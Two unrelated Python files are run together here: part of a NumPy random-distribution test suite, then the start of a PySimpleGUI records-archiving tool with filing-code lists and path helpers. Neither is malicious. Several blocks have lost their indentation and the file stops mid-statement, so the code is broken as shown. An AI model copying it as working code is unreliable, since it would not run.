        actual = nonc_f(dfnum, dfden * 3, nonc)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
        assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
        assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
        self.set_seed()
        actual = nonc_f(dfnum, dfden, nonc * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
        assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
        assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)

    def test_noncentral_f_small_df(self):
        # Degrees of freedom below 1 exercise a separate code path.
        self.set_seed()
        desired = np.array([6.869638627492048, 0.785880199263955])
        actual = random.noncentral_f(0.9, 0.9, 2, size=2)
        assert_array_almost_equal(actual, desired, decimal=14)

    def test_chisquare(self):
        df = [1]
        bad_df = [-1]
        chisquare = random.chisquare
        desired = np.array(
            [0.57022801133088286, 0.51947702108840776, 0.1320969254923558]
        )
        self.set_seed()
        actual = chisquare(df * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, chisquare, bad_df * 3)

    def test_noncentral_chisquare(self):
        df = [1]
        nonc = [2]
        bad_df = [-1]
        bad_nonc = [-2]
        nonc_chi = random.noncentral_chisquare
        desired = np.array([9.0015599467913763, 4.5804135049718742, 6.0872302432834564])
        self.set_seed()
        actual = nonc_chi(df * 3, nonc)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
        assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
        self.set_seed()
        actual = nonc_chi(df, nonc * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
        assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)

    def test_standard_t(self):
        df = [1]
        bad_df = [-1]
        t = random.standard_t
        desired = np.array([3.0702872575217643, 5.8560725167361607, 1.0274791436474273])
        self.set_seed()
        actual = t(df * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, t, bad_df * 3)
        assert_raises(ValueError, random.standard_t, bad_df * 3)

    def test_vonmises(self):
        mu = [2]
        kappa = [1]
        bad_kappa = [-1]
        vonmises = random.vonmises
        desired = np.array(
            [2.9883443664201312, -2.7064099483995943, -1.8672476700665914]
        )
        self.set_seed()
        actual = vonmises(mu * 3, kappa)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
        self.set_seed()
        actual = vonmises(mu, kappa * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, vonmises, mu, bad_kappa * 3)

    def test_pareto(self):
        a = [1]
        bad_a = [-1]
        pareto = random.pareto
        desired = np.array([1.1405622680198362, 1.1465519762044529, 1.0389564467453547])
        self.set_seed()
        actual = pareto(a * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, pareto, bad_a * 3)
        assert_raises(ValueError, random.pareto, bad_a * 3)

    def test_weibull(self):
        a = [1]
        bad_a = [-1]
        weibull = random.weibull
        desired = np.array(
            [0.76106853658845242, 0.76386282278691653, 0.71243813125891797]
        )
        self.set_seed()
        actual = weibull(a * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, weibull, bad_a * 3)
        assert_raises(ValueError, random.weibull, bad_a * 3)

    def test_power(self):
        a = [1]
        bad_a = [-1]
        power = random.power
        desired = np.array(
            [0.53283302478975902, 0.53413660089041659, 0.50955303552646702]
        )
        self.set_seed()
        actual = power(a * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, power, bad_a * 3)
        assert_raises(ValueError, random.power, bad_a * 3)

    def test_laplace(self):
        loc = [0]
        scale = [1]
        bad_scale = [-1]
        laplace = random.laplace
        desired = np.array(
            [0.067921356028507157, 0.070715642226971326, 0.019290950698972624]
        )
        self.set_seed()
        actual = laplace(loc * 3, scale)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, laplace, loc * 3, bad_scale)
        self.set_seed()
        actual = laplace(loc, scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, laplace, loc, bad_scale * 3)

    def test_gumbel(self):
        loc = [0]
        scale = [1]
        bad_scale = [-1]
        gumbel = random.gumbel
        desired = np.array(
            [0.2730318639556768, 0.26936705726291116, 0.33906220393037939]
        )
        self.set_seed()
        actual = gumbel(loc * 3, scale)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, gumbel, loc * 3, bad_scale)
        self.set_seed()
        actual = gumbel(loc, scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, gumbel, loc, bad_scale * 3)

    def test_logistic(self):
        loc = [0]
        scale = [1]
        bad_scale = [-1]
        logistic = random.logistic
        desired = np.array(
            [0.13152135837586171, 0.13675915696285773, 0.038216792802833396]
        )
        self.set_seed()
        actual = logistic(loc * 3, scale)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, logistic, loc * 3, bad_scale)
        self.set_seed()
        actual = logistic(loc, scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, logistic, loc, bad_scale * 3)
        # scale=0 degenerates to the location parameter exactly.
        assert_equal(random.logistic(1.0, 0.0), 1.0)

    def test_lognormal(self):
        mean = [0]
        sigma = [1]
        bad_sigma = [-1]
        lognormal = random.lognormal
        desired = np.array([9.1422086044848427, 8.4013952870126261, 6.3073234116578671])
        self.set_seed()
        actual = lognormal(mean * 3, sigma)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
        assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
        self.set_seed()
        actual = lognormal(mean, sigma * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
        assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)

    def test_rayleigh(self):
        scale = [1]
        bad_scale = [-1]
        rayleigh = random.rayleigh
        desired = np.array([1.2337491937897689, 1.2360119924878694, 1.1936818095781789])
        self.set_seed()
        actual = rayleigh(scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, rayleigh, bad_scale * 3)

    def test_wald(self):
        mean = [0.5]
        scale = [1]
        bad_mean = [0]
        bad_scale = [-2]
        wald = random.wald
        desired = np.array(
            [0.11873681120271318, 0.12450084820795027, 0.9096122728408238]
        )
        self.set_seed()
        actual = wald(mean * 3, scale)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, wald, bad_mean * 3, scale)
        assert_raises(ValueError, wald, mean * 3, bad_scale)
        assert_raises(ValueError, random.wald, bad_mean * 3, scale)
        assert_raises(ValueError, random.wald, mean * 3, bad_scale)
        self.set_seed()
        actual = wald(mean, scale * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, wald, bad_mean, scale * 3)
        assert_raises(ValueError, wald, mean, bad_scale * 3)
        assert_raises(ValueError, wald, 0.0, 1)
        assert_raises(ValueError, wald, 0.5, 0.0)

    def test_triangular(self):
        left = [1]
        right = [3]
        mode = [2]
        bad_left_one = [3]
        bad_mode_one = [4]
        # right * 2 == [3, 3]: both left and mode set equal to right,
        # an invalid degenerate ordering.
        bad_left_two, bad_mode_two = right * 2
        triangular = random.triangular
        desired = np.array([2.03339048710429, 2.0347400359389356, 2.0095991069536208])
        self.set_seed()
        actual = triangular(left * 3, mode, right)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
        assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
        assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
        self.set_seed()
        actual = triangular(left, mode * 3, right)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
        assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
        assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
        self.set_seed()
        actual = triangular(left, mode, right * 3)
        assert_array_almost_equal(actual, desired, decimal=14)
        assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
        assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
        assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
        assert_raises(ValueError, triangular, 10.0, 0.0, 20.0)
        assert_raises(ValueError, triangular, 10.0, 25.0, 20.0)
        assert_raises(ValueError, triangular, 10.0, 10.0, 10.0)

    def test_binomial(self):
        n = [1]
        p = [0.5]
        bad_n = [-1]
        bad_p_one = [-1]
        bad_p_two = [1.5]
        binom = random.binomial
        desired = np.array([1, 1, 1])
        self.set_seed()
        actual = binom(n * 3, p)
        assert_array_equal(actual, desired)
        self.set_seed()
        actual = binom(n * 3, p, size=(3,))
        assert_array_equal(actual, desired)
        assert_raises(ValueError, binom, bad_n * 3, p)
        assert_raises(ValueError, binom, n * 3, bad_p_one)
        assert_raises(ValueError, binom, n * 3, bad_p_two)
        self.set_seed()
        actual = binom(n, p * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, binom, bad_n, p * 3)
        assert_raises(ValueError, binom, n, bad_p_one * 3)
        assert_raises(ValueError, binom, n, bad_p_two * 3)

    def test_negative_binomial(self):
        n = [1]
        p = [0.5]
        bad_n = [-1]
        bad_p_one = [-1]
        bad_p_two = [1.5]
        neg_binom = random.negative_binomial
        desired = np.array([1, 0, 1])
        self.set_seed()
        actual = neg_binom(n * 3, p)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, neg_binom, bad_n * 3, p)
        assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
        assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
        self.set_seed()
        actual = neg_binom(n, p * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, neg_binom, bad_n, p * 3)
        assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
        assert_raises(ValueError, neg_binom, n, bad_p_two * 3)

    def test_poisson(self):
        # _poisson_lam_max is the largest lam the implementation accepts;
        # twice that value must be rejected.
        max_lam = random.RandomState()._poisson_lam_max
        lam = [1]
        bad_lam_one = [-1]
        bad_lam_two = [max_lam * 2]
        poisson = random.poisson
        desired = np.array([1, 1, 0])
        self.set_seed()
        actual = poisson(lam * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, poisson, bad_lam_one * 3)
        assert_raises(ValueError, poisson, bad_lam_two * 3)

    def test_zipf(self):
        a = [2]
        bad_a = [0]
        zipf = random.zipf
        desired = np.array([2, 2, 1])
        self.set_seed()
        actual = zipf(a * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, zipf, bad_a * 3)
        # NaN comparisons inside zipf emit invalid-value warnings; suppress
        # them so only the ValueError matters.
        with np.errstate(invalid="ignore"):
            assert_raises(ValueError, zipf, np.nan)
            assert_raises(ValueError, zipf, [0, 0, np.nan])

    def test_geometric(self):
        p = [0.5]
        bad_p_one = [-1]
        bad_p_two = [1.5]
        geom = random.geometric
        desired = np.array([2, 2, 2])
        self.set_seed()
        actual = geom(p * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, geom, bad_p_one * 3)
        assert_raises(ValueError, geom, bad_p_two * 3)

    def test_hypergeometric(self):
        ngood = [1]
        nbad = [2]
        nsample = [2]
        bad_ngood = [-1]
        bad_nbad = [-2]
        bad_nsample_one = [0]
        bad_nsample_two = [4]
        hypergeom = random.hypergeometric
        desired = np.array([1, 1, 1])
        self.set_seed()
        actual = hypergeom(ngood * 3, nbad, nsample)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
        assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
        assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
        assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
        self.set_seed()
        actual = hypergeom(ngood, nbad * 3, nsample)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
        assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
        assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
        assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
        self.set_seed()
        actual = hypergeom(ngood, nbad, nsample * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
        assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
        assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
        assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
        assert_raises(ValueError, hypergeom, -1, 10, 20)
        assert_raises(ValueError, hypergeom, 10, -1, 20)
        assert_raises(ValueError, hypergeom, 10, 10, 0)
        assert_raises(ValueError, hypergeom, 10, 10, 25)

    def test_logseries(self):
        p = [0.5]
        bad_p_one = [2]
        bad_p_two = [-1]
        logseries = random.logseries
        desired = np.array([1, 1, 1])
        self.set_seed()
        actual = logseries(p * 3)
        assert_array_equal(actual, desired)
        assert_raises(ValueError, logseries, bad_p_one * 3)
        assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
    """Each seeded RandomState must produce the same stream whether it is
    driven from worker threads or serially."""

    def setup(self):
        self.seeds = range(4)

    def check_function(self, function, sz):
        """Run *function(state, out)* once per seed, threaded and serial,
        and require both result sets to agree."""
        from threading import Thread

        threaded = np.empty((len(self.seeds),) + sz)
        serial = np.empty((len(self.seeds),) + sz)

        workers = [
            Thread(target=function, args=(random.RandomState(seed), buf))
            for seed, buf in zip(self.seeds, threaded)
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

        for seed, buf in zip(self.seeds, serial):
            function(random.RandomState(seed), buf)

        # 32-bit Windows switches x87 FPU precision mode per thread, so a
        # tiny tolerance is allowed there; elsewhere demand exact equality.
        if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
            assert_array_almost_equal(threaded, serial)
        else:
            assert_array_equal(threaded, serial)

    def test_normal(self):
        def gen_random(state, out):
            out[...] = state.normal(size=10000)

        self.check_function(gen_random, sz=(10000,))

    def test_exp(self):
        def gen_random(state, out):
            out[...] = state.exponential(scale=np.ones((100, 1000)))

        self.check_function(gen_random, sz=(100, 1000))

    def test_multinomial(self):
        def gen_random(state, out):
            out[...] = state.multinomial(10, [1 / 6.0] * 6, size=10000)

        self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
    """Length-1 array arguments must produce shape-(1,) outputs (gh-4263)."""

    def setup(self):
        self.argOne = np.array([2])
        self.argTwo = np.array([3])
        self.argThree = np.array([4])
        self.tgtShape = (1,)

    def test_one_arg_funcs(self):
        funcs = (
            random.exponential,
            random.standard_gamma,
            random.chisquare,
            random.standard_t,
            random.pareto,
            random.weibull,
            random.power,
            random.rayleigh,
            random.poisson,
            random.zipf,
            random.geometric,
            random.logseries,
        )
        # These two require a probability argument strictly below 1.
        probfuncs = (random.geometric, random.logseries)
        for func in funcs:
            arg = np.array([0.5]) if func in probfuncs else self.argOne
            out = func(arg)
            assert_equal(out.shape, self.tgtShape)

    def test_two_arg_funcs(self):
        funcs = (
            random.uniform,
            random.normal,
            random.beta,
            random.gamma,
            random.f,
            random.noncentral_chisquare,
            random.vonmises,
            random.laplace,
            random.gumbel,
            random.logistic,
            random.lognormal,
            random.wald,
            random.binomial,
            random.negative_binomial,
        )
        # These two require a probability second argument (p <= 1).
        probfuncs = (random.binomial, random.negative_binomial)
        for func in funcs:
            second = np.array([0.5]) if func in probfuncs else self.argTwo
            # Array/array, scalar/array and array/scalar combinations
            # must all broadcast to shape (1,).
            for a, b in (
                (self.argOne, second),
                (self.argOne[0], second),
                (self.argOne, second[0]),
            ):
                out = func(a, b)
                assert_equal(out.shape, self.tgtShape)

    def test_three_arg_funcs(self):
        funcs = [random.noncentral_f, random.triangular, random.hypergeometric]
        for func in funcs:
            for a, b in (
                (self.argOne, self.argTwo),
                (self.argOne[0], self.argTwo),
                (self.argOne, self.argTwo[0]),
            ):
                out = func(a, b, self.argThree)
                assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is corect for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype("l"))
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != "little":
val = val.byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(res == md5)
def test_aliases():
    """random_sample, sample and ranf are aliases returning Python floats."""
    mtrand = randomgen.mtrand
    for alias in (mtrand.random_sample, mtrand.sample, mtrand.ranf):
        assert isinstance(alias(), float)
|
archives_archiver.py | import base64
import os
import logging
import random
import re
import subprocess
import shutil
import sqlite3
import sys
import threading
import time
import pandas as pd
import PySimpleGUI as sg
from dateutil import parser
from contextlib import closing
from typing import List, Dict
from thefuzz import fuzz
from collections import defaultdict
from datetime import datetime
# Version Number
__version__ = 1.48
# Typing Aliases
# pysimplegui_layout
# Environmental Variables
# Root of the records network share.  The raw triple-quoted literal keeps
# two literal backslashes after "R:", a doubled separator that Windows
# path APIs tolerate.  The canonical single-backslash drive root would be
# the non-raw string "R:\\" -- confirm against the server before changing
# (this resolves the original TODO about the four typed backslashes).
RECORDS_SERVER_LOCATION = r"""R:\\"""
# System files that must never be treated as archivable documents.
# ("desktop.ini" was listed twice in the original; the duplicate added
# nothing to membership tests, so the list is deduplicated.)
FILENAMES_TO_IGNORE = ["desktop.ini"]
# Canonical filing taxonomy for project record folders.  Each entry is
# "<filing code> - <description>"; the code (text before the first '-') is
# what ArchiverUtilities.file_code_from_destination_dir() extracts.
DIRECTORY_CHOICES = ['A - General', 'B - Administrative Reviews and Approvals', 'C - Consultants',
                     'D - Environmental Review Process', 'E - Program and Design',
                     'F - Bid Documents and Contract Award', 'G - Construction', "H - Submittals and O&M's",
                     'A1 - Miscellaneous', 'A2 - Working File', 'A3 - Project Directory Matrix & Project Chronology',
                     "B1 - CPS and Chancellor's Approvals", 'B11 - LEED', 'B12 - Outside Regulatory Agencies',
                     'B13 - Coastal Commission', 'B2 - Office of the President UC Regents',
                     'B3 - State Public Works Board', 'B4 - Department of Finance', 'B5 - Legislative Submittals',
                     'B6 - State Fire Marshal', 'B7 - Office of State Architect (DSA)', 'B8 - General Counsel',
                     'B8.1 - General Counsel - Confidential', 'C1 - Executive Architect', 'C1.1 - Selection',
                     'C1.2 - Correspondence', 'C1.3 - Agreement', 'C2 - Other Consultants', 'C2.1 - Selection',
                     'C2.2 - Correspondence', 'C2.3 - Agreement', 'D1 - Environmental Correspondences',
                     'D2 - EIC Forms', 'D3 - CEQA Documentation', 'D4 - Mitigation Monitoring Program', 'E1 - DPP',
                     'E2 - PPG', 'E3 - Budget Cost Estimates', 'E4 - Planning Schedules',
                     'E5 - Program and Design Correspondences', 'E5.1 - Executive Architect Correspondences',
                     'E5.2 - Special Consultants', 'E5.3 - Users. Building Committee. Campus Correspondences',
                     'E5.4 - PPC and PP', 'E5.5 - Office of the President to.from', 'E5.6 - Building Committee to.from',
                     'E5.7 - Other', 'E5.8 - Office of General Counsel', 'E6 - Reports (soils, structural, calcs)',
                     'E7 - Value Engineering', 'E7.1 - Value Engineering Correspondence',
                     'E7.2 - VE Workshop Minutes, Summaries, Final Reports', 'E8 - Program and Design Meeting Minutes',
                     'F1 - Bid and Contract Award Correspondence', 'F1.1 - Executive Architect Correspondences',
                     'F1.2 - Special Consultants Correspondences', 'F1.4 - PPC and PP',
                     'F1.5 - Office of the President Correspondences', 'F1.6 - General Counsel Correspondences',
                     'F1.7 - Pre-Qualification', 'F1.8 - Other', 'F10 - Escrow Agreement',
                     'F2 - Reviews', 'F2.1 - Constructibility, Code Reviews', 'F2.2 - In-house. PP reviews',
                     'F3 - Structural, Title 24, Mech Calculations', 'F4 - Plan Deposits, Planholders, Ads for Bid',
                     'F2.3 - Independent Cost Review', 'F2.4 - Independent Seismic Review', 'F2.5 - Other',
                     'F5 - Drawings and Spec', 'F7 - Bid Summary Forms', 'F7.1 - Bid Protest', 'F8 - Contract',
                     'F9 - Builders Risk Insurance', 'G1 - Construction Correspondence',
                     'G1.1 - Contractor Correspondences', 'G1.2 - Executive Architect Correspondences',
                     'G1.3 - Users.Building Committee.Campus Correspondences', 'G1.4 - PPC and PP. Certified Payroll',
                     'G1.5 - Geotechnical Engineer Correspondences',
                     'G1.6 - Testing and Inspection to Laboratory Correspondences',
                     'G1.7 - General Counsel Correspondences', 'G1.8 - Other',
                     'G10 - Testing and Inspection Reports.Other',
                     'G11 - Proposal Requests. Bulletins. Contractors Response', 'G12 - Request for Information RFI',
                     'G13 - Letter of Instruction LOI', 'G14 - User Request Change in Scope', 'G15 - Change Order',
                     'G16 - Field Orders', 'G17 - Warranties and Guarantees', 'G18 - Punchlist',
                     'G19 - Notice of Completion', 'G2 - Certificate of Payment', 'G20 - Warranty Deficiency',
                     'G21 - Construction Photos', 'G22 - Claims. Public Records Act', 'G22.1 - Claims Confidential',
                     'G23 - Commissioning', 'G24 - Building Permits', "G3 - Contractor's Schedule and Updates",
                     'G4 - Progress Meeting Notes', 'G5 - UCSC Inspectors Daily Reports', 'G5.1 - Hot Work Permits',
                     'G6 - UCSC Memoranda', 'G6.1 - Architects Field Reports', 'G7 - Contractors Daily Reports',
                     'G8 - Testing and Inspection Reports. Geotechnical Engineer',
                     'G9 - Testing and Inspection Reports. Testing Laboratory']
class ArchiverUtilities:
@staticmethod
def split_path(path):
'''splits a path into each piece that corresponds to a mount point, directory name, or file'''
allparts = []
while 1:
parts = os.path.split(path)
if parts[0] == path: # sentinel for absolute paths
allparts.insert(0, parts[0])
break
elif parts[1] == path: # sentinel for relative paths
allparts.insert(0, parts[1])
break
else:
path = parts[0]
allparts.insert(0, parts[1])
return allparts
@staticmethod
def prefixes_from_project_number(project_no: str):
"""
returns root directory prefix for given project number.
eg project number 10638 returns 106xx, project number 9805A returns 98xx
:param project_no: string project number
:return: project directory root directory prefix for choosing correct root directory
"""
project_no = project_no.split("-")[0]
project_no = ''.join(i for i in project_no if i.isdigit())
prefix = project_no[:3]
if len(project_no) <= 4:
prefix = project_no[:2]
return prefix + 'xx', project_no
@staticmethod
def file_code_from_destination_dir(destination_dir_name):
"""
:param destination_dir_name: full destination directory name
:return: string filing code
"""
file_code = ''
dir_name_index = 0
while destination_dir_name[dir_name_index] != '-':
file_code += destination_dir_name[dir_name_index]
dir_name_index += 1
return file_code.strip().upper()
@staticmethod
def open_file_with_system_application(filepath):
"""
System agnostic file opener
:param filepath: str path to file that will be opened
:return:
"""
system_identifier = sys.platform
if system_identifier.lower().startswith("linux"):
subprocess.call(('xdg-open', filepath))
return
if system_identifier.lower().startswith("darwin"):
subprocess.call(('open', filepath))
return
else:
os.startfile(filepath)
return
@staticmethod
def clean_path(path: str):
"""
Process a path string such that it can be used regardless of the os and regardless of whether its length
surpasses the limit in windows file systems
:param path:
:return:
"""
path = path.replace('/', os.sep).replace('\\', os.sep)
if os.sep == '\\' and '\\\\?\\' not in path:
# fix for Windows 260 char limit
relative_levels = len([directory for directory in path.split(os.sep) if directory == '..'])
cwd = [directory for directory in os.getcwd().split(os.sep)] if ':' not in path else []
path = '\\\\?\\' + os.sep.join(cwd[:len(cwd) - relative_levels] \
+ [directory for directory in path.split(os.sep) if directory != ''][
relative_levels:])
return path
@staticmethod
def is_valid_email(potential_email: str):
email_regex = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
return re.fullmatch(email_regex, potential_email)
@staticmethod
def cleanse_filename(proposed_filename: str):
"""removes illegal filename chars"""
clean_filename = proposed_filename.strip()
clean_filename = clean_filename.replace('\n','')
clean_filename = "".join(i for i in clean_filename if i not in "\/:*?<>|")
return clean_filename
@staticmethod
def project_number_from_path(file_path):
    """
    Extracts a project number from a path by locating the 'xx' bucket
    directory and inspecting the one or two directory levels beneath it.

    :param file_path: path string to search
    :return: project number string, or None when none could be extracted
    """
    path_list = ArchiverUtilities.split_path(file_path)
    project_number = None
    xx_level_idx = None
    for idx, path_dir in enumerate(path_list):
        # Remember the first 'xx' bucket directory. Compare with `is None`
        # (not truthiness) so an 'xx' directory at index 0 is not ignored.
        if 'xx' in path_dir and xx_level_idx is None:
            xx_level_idx = idx
            continue
        if xx_level_idx is None:
            continue
        if idx - 1 == xx_level_idx:
            # Directory immediately under the xx level must start with three
            # digits; the length guard avoids IndexError on short names.
            if len(path_dir) >= 3 and path_dir[:3].isdigit():
                project_number = path_dir.split(" ")[0]
            else:
                project_number = None
                break
        if idx - 2 == xx_level_idx:
            # Two levels down, a directory repeating the number refines it
            # (eg a prefix dir followed by the full project number dir).
            if project_number and project_number in path_dir:
                project_number = path_dir.split(" ")[0]
    return project_number
class GuiHandler:
    """
    This class is used to create and launch the various GUI windows used by the script.

    A PySimpleGUI color theme is chosen at random once per instance; optional
    icon images are read and base64-encoded for use in Tree elements.
    """

    def __init__(self, file_icon_path=None, folder_icon_path=None):
        """
        :param file_icon_path: optional path to an image used as the file icon in tree views
        :param folder_icon_path: optional path to an image used as the folder icon in tree views
        """
        self.gui_theme = random.choice(["DarkTeal6", "Green", "LightBrown11", "LightPurple", "SandyBeach", "DarkGreen4",
                                        "BluePurple", "Reddit", "DarkBrown5", "DarkBlue8", "LightGreen6", "LightBlue7",
                                        "DarkGreen2", "Kayak", "LightBrown3", "LightBrown1", "LightTeal", "Tan",
                                        "TealMono", "LightBrown4", "LightBrown3", "LightBrown2", "DarkPurple4",
                                        "DarkPurple", "DarkGreen5", "Dark Brown3", "DarkAmber", "DarkGrey6",
                                        "DarkGrey2", "DarkTeal1", "LightGrey6", "DarkBrown6"])
        self.window_close_button_event = "-WINDOW CLOSE ATTEMPTED-"
        self.file_icon = None
        self.folder_icon = None
        if file_icon_path:
            with open(file_icon_path, "rb") as image:
                self.file_icon = base64.b64encode(image.read())
        if folder_icon_path:
            with open(folder_icon_path, "rb") as image:
                self.folder_icon = base64.b64encode(image.read())

    def make_window(self, window_name: str, window_layout: list):
        """
        Display a window built from *window_layout*, wait for a single event,
        record it under "Button Event", and return the element values.

        :param window_name: window title
        :param window_layout: PySimpleGUI layout (list of rows)
        :return: defaultdict of values; the factory is None, so missing keys
                 still raise KeyError (defaultdict(None, ...) acts like dict)
        """
        sg.theme(self.gui_theme)
        # launch gui
        window = sg.Window(window_name, layout=window_layout, enable_close_attempted_event=True)
        event, values = window.read()
        window.bring_to_front()
        values["Button Event"] = event
        window.close()
        return defaultdict(None, values)

    def directory_treedata(self, parent_dir, dir_name) -> sg.TreeData:
        """
        Creates PySimpleGUI.TreeData objects from a given directory
        https://github.com/PySimpleGUI/PySimpleGUI/blob/master/DemoPrograms/Demo_Tree_Element.py
        :param parent_dir: key of the node under which the tree is rooted
        :param dir_name: path of the directory whose contents are walked
        :return: populated sg.TreeData
        """
        def add_files_in_folder(treedata: sg.TreeData, parent, dirname, file_icon_bytes=None, folder_icon_bytes=None):
            # Recursively add each entry of dirname: folders recurse,
            # files record their size in KB as the row value.
            files = os.listdir(dirname)
            for f in files:
                fullpath = ArchiverUtilities.clean_path(os.path.join(dirname, f))
                if os.path.isdir(fullpath):  # if it's a folder, add folder and recurse
                    treedata.insert(parent, fullpath, f, values=[], icon=folder_icon_bytes)
                    add_files_in_folder(treedata, fullpath, fullpath, file_icon_bytes=file_icon_bytes,
                                        folder_icon_bytes=folder_icon_bytes)
                else:
                    # add file to tree
                    treedata.insert(parent, fullpath, f, values=[os.stat(fullpath).st_size / 1000], icon=file_icon_bytes)

        tree_data = sg.TreeData()
        add_files_in_folder(tree_data, parent=parent_dir, dirname=dir_name, file_icon_bytes=self.file_icon,
                            folder_icon_bytes=self.folder_icon)
        return tree_data

    def welcome_layout(self, version_number=__version__):
        """Layout for the welcome window: shows the app version and asks for the archivist's email."""
        welcome_gui_layout = [
            [sg.Text(f"Archives_Archiver Version: {version_number}")],
            [sg.Text("Email address:"), sg.Input(key="Archivist Email")],
            [sg.Button("Ok"), sg.Button("Exit")]
        ]
        return welcome_gui_layout

    def destination_choice_layout(self, dir_choices: list[str], current_filename: str, default_project_num: str = None,
                                  research_default: bool = False):
        """
        Layout for choosing where an incoming file should be archived.

        :param dir_choices: template directory names offered in the listbox (sorted in place)
        :param current_filename: name of the file being archived (shown read-only)
        :param default_project_num: project number used when the user leaves the field blank
        :param research_default: initial state of the "include research" checkbox
        :return: PySimpleGUI layout list
        """
        dir_choices.sort()
        # TODO try auto_size_text and expand_y
        listbox_width = max([len(dir_name) for dir_name in dir_choices])
        listbox_height = 18
        destination_gui_layout = [
            [sg.Text(f"Choose a location for:")],
            [sg.Input(default_text=current_filename, use_readonly_for_disable=True, disabled=True,
                      background_color='#F7F3EC', text_color="black", key='Inert Filename'), sg.Button("Open Copy")],
            [sg.Text("Default Project:"), sg.Text(default_project_num)],
            [sg.Text("Project Number (Leave Blank to use Default.):"), sg.Input(key="New Project Number")],
            [sg.Text("Destination filename"), sg.Input(key="Filename")],
            [sg.Text("Document date:"), sg.Input(key="Document Date")],
            [sg.Text("Choose Directory to for file:"), sg.Listbox(values=dir_choices, key="Directory Choice",
